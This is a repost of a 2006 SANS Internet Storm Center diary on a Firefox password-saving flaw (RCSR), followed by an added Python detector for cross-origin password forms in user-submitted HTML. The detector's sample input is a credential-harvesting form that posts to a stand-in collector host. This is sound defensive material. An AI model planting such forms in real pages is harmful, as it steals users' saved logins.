Wednesday, November 22, 2006 10:02 AM cmosby

SANS - Internet Storm Center - Reverse Cross-Site Request (RCSR) vulnerability

Reverse Cross-Site Request (RCSR) vulnerability (NEW)

Published: 2006-11-22
Last Updated: 2006-11-22 14:43:18 UTC by Adrien de Beaupre (Version: 1)

A new vulnerability in Firefox has recently been disclosed. The password saving functionality of Firefox can be exploited to expose usernames and passwords to other sites, such as those used for blogs or any page requesting user input. The proof of concept page shows the username and password input in a Google URL. They are calling it a Reverse Cross-Site Request (RCSR) vulnerability. The advisory appears here. This type of attack vector appears to also affect Internet Explorer.

Bugzilla link.

Mozilla has apparently been advised of the vulnerability; there is currently no vendor patch. The workaround in this particular case would be to never use Firefox to save passwords for any web site. The option is under Tools, Options, Security. Here is a link showing how to disable it.

Thanks to our reader Carsten for letting us know.

Cheers,
Adrien de Beaupre
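
For operators of blogs and other pages that accept user input, a server-side complement to the browser workaround above is to flag submitted HTML that contains a form with a password field posting to another origin. The sketch below is an added example, not part of the original diary or the advisory; it assumes the exposure path is such a form (consistent with the proof of concept showing the credentials in a Google URL), and the names `scan_user_html`, `PasswordFormScanner` and the `.example` hosts are hypothetical.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

def origin(url):
    """(scheme, host, port) with default ports filled in."""
    p = urlsplit(url)
    return (p.scheme, p.hostname, p.port or {"http": 80, "https": 443}.get(p.scheme))

class PasswordFormScanner(HTMLParser):
    """Flags forms that hold a password input and submit to another origin."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.findings = []   # (resolved action, method) per flagged form
        self._form = None    # form currently open; nested <form> tags are ignored

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and self._form is None:
            self._form = {"action": urljoin(self.page_url, a.get("action") or ""),
                          "method": (a.get("method") or "get").lower(),
                          "password": False}
        elif tag == "input" and self._form is not None:
            if (a.get("type") or "").lower() == "password":
                self._form["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._finish()

    def _finish(self):
        form, self._form = self._form, None
        if form and form["password"] and origin(form["action"]) != origin(self.page_url):
            self.findings.append((form["action"], form["method"]))

def scan_user_html(html, page_url):
    scanner = PasswordFormScanner(page_url)
    scanner.feed(html)
    scanner.close()
    scanner._finish()        # an unclosed <form> still renders in a browser
    return scanner.findings

# Constructed samples: the site's own login form and a form left in a comment.
PAGE = "https://blog.example/post/1"
OWN_LOGIN = '<form action="/login" method="post"><input name="u"><input type="password" name="p"></form>'
COMMENT = '<p>hi</p><form action="http://collector.example/q"><input name="u"><input type=password name="p">'

if __name__ == "__main__":
    print(scan_user_html(COMMENT, PAGE))
```

A non-empty result means the submitted markup should be rejected or stripped of form elements before it is stored or rendered.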

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.
